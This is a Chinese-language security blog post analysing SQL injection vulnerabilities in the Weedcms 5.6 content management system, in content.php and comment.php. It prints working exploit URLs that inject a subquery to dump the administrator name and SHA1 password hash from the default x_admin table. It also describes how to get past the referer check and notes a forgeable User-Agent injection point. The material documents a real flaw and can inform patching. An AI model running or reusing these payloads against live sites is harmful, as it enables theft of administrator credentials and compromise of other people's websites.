分析野草(Weedcms)cms sql注入漏洞

文章没什么技术含量 有错误的地方多多包含! 看这个程序是因为以前心灵大牛子啊土司发过这个一个什么挖洞普及文 就是用的这个程序演示的但是当时并没有发现漏洞 小菜简单看了一下 三个地方有问题,一个是content.php文件的注入,二是comment.php的注入.. 貌似后台登录还有一个伪造agent注入,那个没看 有兴趣的朋友可以自己看看

1.content.php盲注(鸡肋):
109行:

这里直接没过滤,也不知道用来干什么的 利用方法也有点麻烦,先发布文章(必须注册会员)
然后直接修改原password表单的name为:content_link[x]

然后直接提交 1′,(select 1234567890))# /* gpc可以无视 为什么后面说到 */
然后insert会闭合成:
www.it165.netinsert into `x_content_link` (`link_url`,`content_id`) values (’1′,(select 1234567890))#’,’22′)
不过此处插入到库后找了半天没找到回显.不知道干嘛用的,所以此处注入很鸡肋,而且还必须要有发布权限,so…无视吧~~

2.comment.php注入(秒杀)
27行：

这里也有两个问题，一个是评论内容comment_content可能作者考虑到评论的完整，所以只用了个trim去掉首尾空没有其他过滤~~
然后就是直接把$_SERVER['HTTP_USER_AGENT']赋值给comment_agent,而这个东西是可以伪造的~~~
so…这里其实是两个注入,不过考虑到$_SERVER['HTTP_USER_AGENT']还要伪造,所以就直接演示comment_content处的注入~~
由于直接在文章中使用系统自带的ajax评论会被过滤单引号,所以直接get过去,但是由于程序使用了check_request()函数验证来路

所以不能直接浏览器输入来get过去,先帖exp:
comment.php?action=content_comment_insert&content_id=[ID]&comment_authcode=[验证码]&comment_content=3′,(select+concat(0x5E24,admin_name,0x3A,admin_password,0x245E)+from+[表名]+limit+0,1),”,”,”,’1′,’[ID]‘,”,”)%23

这里用来测试的文章ID为17,然后管理表名是x_admin,这个x_前缀是野草5.6默认的~其他版本不清楚…所以构造exp如下:
comment.php?action=content_comment_insert&content_id=17&comment_authcode=cdd&comment_content=3′,(select+concat(0x5E24,admin_name,0x3A,admin_password,0x245E)+from+x_admin+limit+0,1),”,”,”,’1′,’17′,”,”)%23
这里的comment_authcode=cdd为验证码，获取验证码访问authcode.php文件就行了，如验证码为abc，那么则改为comment_authcode=abc

然后在首页随便找个连接,将herf改为上面exp,然后点击该链接get过去即可~~~

get过后到这个文件页看评论…帐号密码爆出来了(注,密码为sha1加密)

原创文章转载请注明出处: : http://madman.in/madman5/492.htm | 疯子博客|Madman@SysCiC.TeAm